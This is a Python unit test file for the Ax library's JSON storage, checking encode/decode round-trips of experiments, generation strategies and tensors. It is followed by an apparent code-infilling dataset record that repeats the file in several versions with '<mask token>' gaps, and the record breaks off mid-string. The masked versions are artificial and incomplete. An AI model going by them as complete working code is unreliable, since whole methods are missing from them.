get_augmented_hartmann_metric,
get_batch_trial,
get_botorch_model,
get_botorch_model_with_default_acquisition_class,
get_branin_data,
get_branin_experiment,
get_branin_metric,
get_choice_parameter,
get_experiment_with_batch_and_single_trial,
get_experiment_with_data,
get_experiment_with_trial_with_ttl,
get_experiment_with_map_data_type,
get_factorial_metric,
get_fixed_parameter,
get_generator_run,
get_map_data,
get_hartmann_metric,
get_list_surrogate,
get_metric,
get_mll_type,
get_model_type,
get_multi_objective,
get_multi_objective_optimization_config,
get_multi_type_experiment,
get_objective,
get_objective_threshold,
get_optimization_config,
get_order_constraint,
get_outcome_constraint,
get_parameter_constraint,
get_percentile_early_stopping_strategy,
get_range_parameter,
get_scalarized_objective,
get_search_space,
get_simple_experiment_with_batch_trial,
get_sum_constraint1,
get_sum_constraint2,
get_surrogate,
get_synthetic_runner,
get_trial,
)
from ax.utils.testing.modeling_stubs import (
get_generation_strategy,
get_observation_features,
get_transform_type,
)
from botorch.test_functions.synthetic import Ackley
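# (display name, stub factory) pairs; testEncodeDecode below round-trips each
# object through object_to_json / object_from_json and checks equality.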
TEST_CASES = [
("AbandonedArm", get_abandoned_arm),
("Arm", get_arm),
("AugmentedBraninMetric", get_augmented_branin_metric),
("AugmentedHartmannMetric", get_augmented_hartmann_metric),
("BatchTrial", get_batch_trial),
("BenchmarkProblem", get_branin_benchmark_problem),
("BoTorchModel", get_botorch_model),
("BoTorchModel", get_botorch_model_with_default_acquisition_class),
("BraninMetric", get_branin_metric),
("ChoiceParameter", get_choice_parameter),
("Experiment", get_experiment_with_batch_and_single_trial),
("Experiment", get_experiment_with_trial_with_ttl),
("Experiment", get_experiment_with_data),
("Experiment", get_experiment_with_map_data_type),
("FactorialMetric", get_factorial_metric),
("FixedParameter", get_fixed_parameter),
("Hartmann6Metric", get_hartmann_metric),
("GenerationStrategy", partial(get_generation_strategy, with_experiment=True)),
("GeneratorRun", get_generator_run),
("ListSurrogate", get_list_surrogate),
("MapData", get_map_data),
("Metric", get_metric),
("MultiObjective", get_multi_objective),
("MultiObjectiveOptimizationConfig", get_multi_objective_optimization_config),
("MultiTypeExperiment", get_multi_type_experiment),
("ObservationFeatures", get_observation_features),
("Objective", get_objective),
("ObjectiveThreshold", get_objective_threshold),
("OptimizationConfig", get_optimization_config),
("OrderConstraint", get_order_constraint),
("OutcomeConstraint", get_outcome_constraint),
("PercentileEarlyStoppingStrategy", get_percentile_early_stopping_strategy),
("ParameterConstraint", get_parameter_constraint),
("RangeParameter", get_range_parameter),
("ScalarizedObjective", get_scalarized_objective),
("SearchSpace", get_search_space),
("SimpleBenchmarkProblem", get_mult_simple_benchmark_problem),
("SimpleBenchmarkProblem", get_branin_simple_benchmark_problem),
("SimpleBenchmarkProblem", get_sum_simple_benchmark_problem),
("SimpleExperiment", get_simple_experiment_with_batch_trial),
("SumConstraint", get_sum_constraint1),
("SumConstraint", get_sum_constraint2),
("Surrogate", get_surrogate),
("SyntheticRunner", get_synthetic_runner),
("Type[Acquisition]", get_acquisition_type),
("Type[AcquisitionFunction]", get_acquisition_function_type),
("Type[Model]", get_model_type),
("Type[MarginalLogLikelihood]", get_mll_type),
("Type[Transform]", get_transform_type),
("Trial", get_trial),
]
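# Round-trip tests for the JSON storage layer: encode, decode, compare.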
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError("foobar"))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError("foobar"))
self.assertRaises(JSONDecodeError, object_from_json, {"__type": "foobar"})
def testSaveAndLoad(self):
with tempfile.NamedTemporaryFile(mode="w+", delete=False, suffix=".json") as f:
save_experiment(self.experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, self.experiment)
os.remove(f.name)
def testSaveValidation(self):
with self.assertRaises(ValueError):
save_experiment(self.experiment.trials[0], "test.json")
def testValidateFilename(self):
bad_filename = "test"
self.assertRaises(ValueError, save_experiment, self.experiment, bad_filename)
def testEncodeDecode(self):
for class_, fake_func in TEST_CASES:
# Can't load trials from JSON, because a batch needs an experiment
# in order to be initialized
if class_ == "BatchTrial" or class_ == "Trial":
continue
# Can't load parameter constraints from JSON, because they require
# a SearchSpace in order to be initialized
if class_ == "OrderConstraint" or class_ == "SumConstraint":
continue
original_object = fake_func()
json_object = object_to_json(original_object)
converted_object = object_from_json(json_object)
if class_ == "SimpleExperiment":
# Evaluation functions will be different, so need to do
# this so equality test passes
with self.assertRaises(RuntimeError):
converted_object.evaluation_function(parameterization={})
original_object.evaluation_function = None
converted_object.evaluation_function = None
self.assertEqual(
original_object,
converted_object,
msg=f"Error encoding/decoding {class_}.",
)
def testEncodeDecodeTorchTensor(self):
x = torch.tensor(
[[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64, device=torch.device("cpu")
)
expected_json = {
"__type": "Tensor",
"value": [[1.0, 2.0], [3.0, 4.0]],
"dtype": {"__type": "torch_dtype", "value": "torch.float64"},
"device": {"__type": "torch_device", "value": "cpu"},
}
x_json = object_to_json(x)
self.assertEqual(expected_json, x_json)
x2 = object_from_json(x_json)
self.assertTrue(torch.equal(x, x2))
def testDecodeGenerationStrategy(self):
generation_strategy = get_generation_strategy()
experiment = get_branin_experiment()
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertGreater(len(new_generation_strategy._steps), 0)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
# Model has not yet been initialized on this GS since it hasn't generated
# anything yet.
self.assertIsNone(new_generation_strategy.model)
# Check that we can encode and decode the generation strategy after
# it has generated some generator runs. Since we now need to `gen`,
# we remove the fake callable kwarg we added, since model does not
# expect it.
generation_strategy = get_generation_strategy(with_callable_model_kwarg=False)
gr = generation_strategy.gen(experiment)
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
# Since this GS has now generated one generator run, model should have
# been initialized and restored when decoding from JSON.
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
# Check that we can encode and decode the generation strategy after
# it has generated some trials and been updated with some data.
generation_strategy = new_generation_strategy
experiment.new_trial(gr) # Add previously generated GR as trial.
# Make generation strategy aware of the trial's data via `gen`.
generation_strategy.gen(experiment, data=get_branin_data())
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(
branin_problem.f(1, 2), new_branin_problem.f(1, 2), branin(1, 2)
)
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
# Test using `from_botorch`.
ackley_problem = SimpleBenchmarkProblem(
f=from_botorch(Ackley()), noise_sd=0.0, minimize=True
)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(
ackley_problem.f(1, 2), new_ackley_problem.f(1, 2), ackley(1, 2)
)
def testRegistryAdditions(self):
class MyRunner(Runner):
def run():
pass
def staging_required():
return False
class MyMetric(Metric):
pass
register_metric(MyMetric)
register_runner(MyRunner)
experiment = get_experiment_with_batch_and_single_trial()
experiment.runner = MyRunner()
experiment.add_tracking_metric(MyMetric(name="my_metric"))
with tempfile.NamedTemporaryFile(mode="w+", delete=False, suffix=".json") as f:
save_experiment(experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, experiment)
os.remove(f.name)
def testEncodeUnknownClassToDict(self):
# Cannot encode `UnknownClass` type because it is not registered in the
# CLASS_ENCODER_REGISTRY.
class UnknownClass:
def __init__(self):
pass
with self.assertRaisesRegex(
ValueError, "is a class. Add it to the CLASS_ENCODER_REGISTRY"
):
object_to_json(UnknownClass)
# `UnknownClass` type is registered in the CLASS_ENCODER_REGISTRY and uses the
# `botorch_modular_to_dict` encoder, but `UnknownClass` is not registered in
# the `botorch_modular_registry.py` file.
CLASS_ENCODER_REGISTRY[UnknownClass] = botorch_modular_to_dict
with self.assertRaisesRegex(
ValueError,
"does not have a corresponding parent class in CLASS_TO_REGISTRY",
):
object_to_json(UnknownClass)
def testDecodeUnknownClassFromJson(self):
with self.assertRaisesRegex(
ValueError,
"does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY",
):
class_from_json({"index": 0, "class": "unknown_path"})
|
flexible
|
{
"blob_id": "52eec56f7f5da8356f61301994f846ef7769f73b",
"index": 6189,
"step-1": "<mask token>\n\n\nclass JSONStoreTest(TestCase):\n\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\n 'foobar'))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\n 'foobar'))\n self.assertRaises(JSONDecodeError, object_from_json, {'__type':\n 'foobar'})\n <mask token>\n <mask token>\n\n def testValidateFilename(self):\n bad_filename = 'test'\n self.assertRaises(ValueError, save_experiment, self.experiment,\n bad_filename)\n <mask token>\n <mask token>\n <mask token>\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json\n (arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),\n branin(1, 2))\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),\n noise_sd=0.0, minimize=True)\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),\n ackley(1, 2))\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass JSONStoreTest(TestCase):\n\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\n 'foobar'))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\n 'foobar'))\n self.assertRaises(JSONDecodeError, object_from_json, {'__type':\n 'foobar'})\n\n def testSaveAndLoad(self):\n with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=\n '.json') as f:\n save_experiment(self.experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, self.experiment)\n os.remove(f.name)\n <mask token>\n\n def testValidateFilename(self):\n bad_filename = 'test'\n self.assertRaises(ValueError, save_experiment, self.experiment,\n bad_filename)\n <mask token>\n\n def testEncodeDecodeTorchTensor(self):\n x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,\n device=torch.device('cpu'))\n expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0, \n 4.0]], 'dtype': {'__type': 'torch_dtype', 'value':\n 'torch.float64'}, 'device': {'__type': 'torch_device', 'value':\n 'cpu'}}\n x_json = object_to_json(x)\n self.assertEqual(expected_json, x_json)\n x2 = object_from_json(x_json)\n self.assertTrue(torch.equal(x, x2))\n\n def testDecodeGenerationStrategy(self):\n generation_strategy = get_generation_strategy()\n experiment = get_branin_experiment()\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertGreater(len(new_generation_strategy._steps), 0)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsNone(new_generation_strategy.model)\n generation_strategy = get_generation_strategy(with_callable_model_kwarg\n =False)\n gr = generation_strategy.gen(experiment)\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n generation_strategy = new_generation_strategy\n experiment.new_trial(gr)\n generation_strategy.gen(experiment, data=get_branin_data())\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json\n (arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),\n branin(1, 2))\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),\n noise_sd=0.0, minimize=True)\n new_ackley_problem = 
object_from_json(object_to_json(ackley_problem))\n self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),\n ackley(1, 2))\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass JSONStoreTest(TestCase):\n\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\n 'foobar'))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\n 'foobar'))\n self.assertRaises(JSONDecodeError, object_from_json, {'__type':\n 'foobar'})\n\n def testSaveAndLoad(self):\n with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=\n '.json') as f:\n save_experiment(self.experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, self.experiment)\n os.remove(f.name)\n\n def testSaveValidation(self):\n with self.assertRaises(ValueError):\n save_experiment(self.experiment.trials[0], 'test.json')\n\n def testValidateFilename(self):\n bad_filename = 'test'\n self.assertRaises(ValueError, save_experiment, self.experiment,\n bad_filename)\n <mask token>\n\n def testEncodeDecodeTorchTensor(self):\n x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,\n device=torch.device('cpu'))\n expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0, \n 4.0]], 'dtype': {'__type': 'torch_dtype', 'value':\n 'torch.float64'}, 'device': {'__type': 'torch_device', 'value':\n 'cpu'}}\n x_json = object_to_json(x)\n self.assertEqual(expected_json, x_json)\n x2 = object_from_json(x_json)\n self.assertTrue(torch.equal(x, x2))\n\n def testDecodeGenerationStrategy(self):\n generation_strategy = get_generation_strategy()\n experiment = get_branin_experiment()\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertGreater(len(new_generation_strategy._steps), 0)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsNone(new_generation_strategy.model)\n generation_strategy = get_generation_strategy(with_callable_model_kwarg\n =False)\n gr = generation_strategy.gen(experiment)\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n generation_strategy = new_generation_strategy\n experiment.new_trial(gr)\n generation_strategy.gen(experiment, data=get_branin_data())\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json\n (arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),\n branin(1, 2))\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n ackley_problem = 
SimpleBenchmarkProblem(f=from_botorch(Ackley()),\n noise_sd=0.0, minimize=True)\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),\n ackley(1, 2))\n <mask token>\n <mask token>\n\n def testDecodeUnknownClassFromJson(self):\n with self.assertRaisesRegex(ValueError,\n 'does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY'\n ):\n class_from_json({'index': 0, 'class': 'unknown_path'})\n",
"step-4": "<mask token>\n\n\nclass JSONStoreTest(TestCase):\n\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\n 'foobar'))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\n 'foobar'))\n self.assertRaises(JSONDecodeError, object_from_json, {'__type':\n 'foobar'})\n\n def testSaveAndLoad(self):\n with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=\n '.json') as f:\n save_experiment(self.experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, self.experiment)\n os.remove(f.name)\n\n def testSaveValidation(self):\n with self.assertRaises(ValueError):\n save_experiment(self.experiment.trials[0], 'test.json')\n\n def testValidateFilename(self):\n bad_filename = 'test'\n self.assertRaises(ValueError, save_experiment, self.experiment,\n bad_filename)\n <mask token>\n\n def testEncodeDecodeTorchTensor(self):\n x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,\n device=torch.device('cpu'))\n expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0, \n 4.0]], 'dtype': {'__type': 'torch_dtype', 'value':\n 'torch.float64'}, 'device': {'__type': 'torch_device', 'value':\n 'cpu'}}\n x_json = object_to_json(x)\n self.assertEqual(expected_json, x_json)\n x2 = object_from_json(x_json)\n self.assertTrue(torch.equal(x, x2))\n\n def testDecodeGenerationStrategy(self):\n generation_strategy = get_generation_strategy()\n experiment = get_branin_experiment()\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertGreater(len(new_generation_strategy._steps), 0)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsNone(new_generation_strategy.model)\n generation_strategy = get_generation_strategy(with_callable_model_kwarg\n =False)\n gr = generation_strategy.gen(experiment)\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n generation_strategy = new_generation_strategy\n experiment.new_trial(gr)\n generation_strategy.gen(experiment, data=get_branin_data())\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json\n (arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),\n branin(1, 2))\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n ackley_problem = 
SimpleBenchmarkProblem(f=from_botorch(Ackley()),\n noise_sd=0.0, minimize=True)\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),\n ackley(1, 2))\n\n def testRegistryAdditions(self):\n\n\n class MyRunner(Runner):\n\n def run():\n pass\n\n def staging_required():\n return False\n\n\n class MyMetric(Metric):\n pass\n register_metric(MyMetric)\n register_runner(MyRunner)\n experiment = get_experiment_with_batch_and_single_trial()\n experiment.runner = MyRunner()\n experiment.add_tracking_metric(MyMetric(name='my_metric'))\n with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=\n '.json') as f:\n save_experiment(experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, experiment)\n os.remove(f.name)\n\n def testEncodeUnknownClassToDict(self):\n\n\n class UnknownClass:\n\n def __init__(self):\n pass\n with self.assertRaisesRegex(ValueError,\n 'is a class. Add it to the CLASS_ENCODER_REGISTRY'):\n object_to_json(UnknownClass)\n CLASS_ENCODER_REGISTRY[UnknownClass] = botorch_modular_to_dict\n with self.assertRaisesRegex(ValueError,\n 'does not have a corresponding parent class in CLASS_TO_REGISTRY'):\n object_to_json(UnknownClass)\n\n def testDecodeUnknownClassFromJson(self):\n with self.assertRaisesRegex(ValueError,\n 'does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY'\n ):\n class_from_json({'index': 0, 'class': 'unknown_path'})\n",
"step-5": "#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport os\nimport tempfile\nfrom functools import partial\n\nimport numpy as np\nimport torch\nfrom ax.benchmark.benchmark_problem import SimpleBenchmarkProblem\nfrom ax.core.metric import Metric\nfrom ax.core.runner import Runner\nfrom ax.exceptions.storage import JSONDecodeError, JSONEncodeError\nfrom ax.modelbridge.base import ModelBridge\nfrom ax.modelbridge.registry import Models\nfrom ax.storage.json_store.decoder import (\n generation_strategy_from_json,\n object_from_json,\n)\nfrom ax.storage.json_store.decoders import class_from_json\nfrom ax.storage.json_store.encoder import object_to_json\nfrom ax.storage.json_store.encoders import botorch_modular_to_dict\nfrom ax.storage.json_store.load import load_experiment\nfrom ax.storage.json_store.registry import CLASS_ENCODER_REGISTRY\nfrom ax.storage.json_store.save import save_experiment\nfrom ax.storage.metric_registry import register_metric\nfrom ax.storage.runner_registry import register_runner\nfrom ax.utils.common.testutils import TestCase\nfrom ax.utils.measurement.synthetic_functions import ackley, branin, from_botorch\nfrom ax.utils.testing.benchmark_stubs import (\n get_branin_benchmark_problem,\n get_branin_simple_benchmark_problem,\n get_mult_simple_benchmark_problem,\n get_sum_simple_benchmark_problem,\n)\nfrom ax.utils.testing.core_stubs import (\n get_abandoned_arm,\n get_acquisition_function_type,\n get_acquisition_type,\n get_arm,\n get_augmented_branin_metric,\n get_augmented_hartmann_metric,\n get_batch_trial,\n get_botorch_model,\n get_botorch_model_with_default_acquisition_class,\n get_branin_data,\n get_branin_experiment,\n get_branin_metric,\n get_choice_parameter,\n get_experiment_with_batch_and_single_trial,\n get_experiment_with_data,\n get_experiment_with_trial_with_ttl,\n get_experiment_with_map_data_type,\n get_factorial_metric,\n get_fixed_parameter,\n get_generator_run,\n get_map_data,\n get_hartmann_metric,\n get_list_surrogate,\n get_metric,\n get_mll_type,\n get_model_type,\n get_multi_objective,\n get_multi_objective_optimization_config,\n get_multi_type_experiment,\n get_objective,\n get_objective_threshold,\n get_optimization_config,\n get_order_constraint,\n get_outcome_constraint,\n get_parameter_constraint,\n get_percentile_early_stopping_strategy,\n get_range_parameter,\n get_scalarized_objective,\n get_search_space,\n get_simple_experiment_with_batch_trial,\n get_sum_constraint1,\n get_sum_constraint2,\n get_surrogate,\n get_synthetic_runner,\n get_trial,\n)\nfrom ax.utils.testing.modeling_stubs import (\n get_generation_strategy,\n get_observation_features,\n get_transform_type,\n)\nfrom botorch.test_functions.synthetic import Ackley\n\n\nTEST_CASES = [\n (\"AbandonedArm\", get_abandoned_arm),\n (\"Arm\", get_arm),\n (\"AugmentedBraninMetric\", get_augmented_branin_metric),\n (\"AugmentedHartmannMetric\", get_augmented_hartmann_metric),\n (\"BatchTrial\", get_batch_trial),\n (\"BenchmarkProblem\", get_branin_benchmark_problem),\n (\"BoTorchModel\", get_botorch_model),\n (\"BoTorchModel\", get_botorch_model_with_default_acquisition_class),\n (\"BraninMetric\", get_branin_metric),\n (\"ChoiceParameter\", get_choice_parameter),\n (\"Experiment\", get_experiment_with_batch_and_single_trial),\n (\"Experiment\", get_experiment_with_trial_with_ttl),\n (\"Experiment\", 
get_experiment_with_data),\n (\"Experiment\", get_experiment_with_map_data_type),\n (\"FactorialMetric\", get_factorial_metric),\n (\"FixedParameter\", get_fixed_parameter),\n (\"Hartmann6Metric\", get_hartmann_metric),\n (\"GenerationStrategy\", partial(get_generation_strategy, with_experiment=True)),\n (\"GeneratorRun\", get_generator_run),\n (\"ListSurrogate\", get_list_surrogate),\n (\"MapData\", get_map_data),\n (\"Metric\", get_metric),\n (\"MultiObjective\", get_multi_objective),\n (\"MultiObjectiveOptimizationConfig\", get_multi_objective_optimization_config),\n (\"MultiTypeExperiment\", get_multi_type_experiment),\n (\"ObservationFeatures\", get_observation_features),\n (\"Objective\", get_objective),\n (\"ObjectiveThreshold\", get_objective_threshold),\n (\"OptimizationConfig\", get_optimization_config),\n (\"OrderConstraint\", get_order_constraint),\n (\"OutcomeConstraint\", get_outcome_constraint),\n (\"PercentileEarlyStoppingStrategy\", get_percentile_early_stopping_strategy),\n (\"ParameterConstraint\", get_parameter_constraint),\n (\"RangeParameter\", get_range_parameter),\n (\"ScalarizedObjective\", get_scalarized_objective),\n (\"SearchSpace\", get_search_space),\n (\"SimpleBenchmarkProblem\", get_mult_simple_benchmark_problem),\n (\"SimpleBenchmarkProblem\", get_branin_simple_benchmark_problem),\n (\"SimpleBenchmarkProblem\", get_sum_simple_benchmark_problem),\n (\"SimpleExperiment\", get_simple_experiment_with_batch_trial),\n (\"SumConstraint\", get_sum_constraint1),\n (\"SumConstraint\", get_sum_constraint2),\n (\"Surrogate\", get_surrogate),\n (\"SyntheticRunner\", get_synthetic_runner),\n (\"Type[Acquisition]\", get_acquisition_type),\n (\"Type[AcquisitionFunction]\", get_acquisition_function_type),\n (\"Type[Model]\", get_model_type),\n (\"Type[MarginalLogLikelihood]\", get_mll_type),\n (\"Type[Transform]\", get_transform_type),\n (\"Trial\", get_trial),\n]\n\n\nclass JSONStoreTest(TestCase):\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\"foobar\"))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\"foobar\"))\n self.assertRaises(JSONDecodeError, object_from_json, {\"__type\": \"foobar\"})\n\n def testSaveAndLoad(self):\n with tempfile.NamedTemporaryFile(mode=\"w+\", delete=False, suffix=\".json\") as f:\n save_experiment(self.experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, self.experiment)\n os.remove(f.name)\n\n def testSaveValidation(self):\n with self.assertRaises(ValueError):\n save_experiment(self.experiment.trials[0], \"test.json\")\n\n def testValidateFilename(self):\n bad_filename = \"test\"\n self.assertRaises(ValueError, save_experiment, self.experiment, bad_filename)\n\n def testEncodeDecode(self):\n for class_, fake_func in TEST_CASES:\n # Can't load trials from JSON, because a batch needs an experiment\n # in order to be initialized\n if class_ == \"BatchTrial\" or class_ == \"Trial\":\n continue\n\n # Can't load parameter constraints from JSON, because they require\n # a SearchSpace in order to be initialized\n if class_ == \"OrderConstraint\" or class_ == \"SumConstraint\":\n continue\n\n original_object = fake_func()\n json_object = object_to_json(original_object)\n converted_object = object_from_json(json_object)\n\n if class_ == \"SimpleExperiment\":\n # Evaluation functions will be different, so 
